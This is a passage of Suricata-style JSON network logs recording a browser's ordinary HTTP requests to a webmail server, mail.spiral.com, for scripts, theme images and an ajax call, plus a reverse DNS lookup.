Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} 
{"timestamp":"2020-02-29T00:27:04.603842+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.604106+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:27:04.609489+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} 
{"timestamp":"2020-02-29T00:27:04.611348+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.611374+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.611713+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:27:04.612519+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:27:04.625672+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":4}} {"timestamp":"2020-02-29T00:27:04.669222+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:27:04.780014+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":5}} {"timestamp":"2020-02-29T00:27:04.780291+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:27:04.798054+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.803799+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:27:04.806387+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} 
{"timestamp":"2020-02-29T00:27:04.807839+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:27:04.809644+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:27:04.811188+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} 
{"timestamp":"2020-02-29T00:27:04.812217+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} {"timestamp":"2020-02-29T00:27:04.816779+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:27:04.817929+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":10}} {"timestamp":"2020-02-29T00:27:04.818165+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.819069+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} 
{"timestamp":"2020-02-29T00:27:04.819931+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":11}} {"timestamp":"2020-02-29T00:27:04.831587+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:27:04.843532+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51486,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54972,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.846223+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:27:04.847040+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.847645+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:27:04.874816+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":12}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.071870+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.074175+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":4}} 
{"timestamp":"2020-02-29T00:27:05.075180+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:27:05.075225+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.075684+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":5}} {"timestamp":"2020-02-29T00:27:05.080128+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:27:05.080803+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:27:05.081294+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":6}} {"timestamp":"2020-02-29T00:27:05.082259+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":14}} {"timestamp":"2020-02-29T00:27:05.082704+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} 
